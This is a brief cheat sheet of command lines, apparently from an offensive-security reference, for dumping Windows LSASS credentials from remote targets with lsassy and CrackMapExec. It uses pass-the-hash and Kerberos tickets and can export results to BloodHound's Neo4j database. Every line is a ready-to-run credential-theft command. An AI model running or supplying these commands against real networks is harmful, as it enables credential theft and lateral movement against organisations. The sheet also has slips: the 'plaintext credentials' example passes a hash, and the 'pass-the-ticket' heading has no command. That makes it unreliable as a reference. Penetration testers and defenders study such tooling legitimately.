# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS
# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS
# With pass-the-ticket (Kerberos)
# CrackMapExec Module examples
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd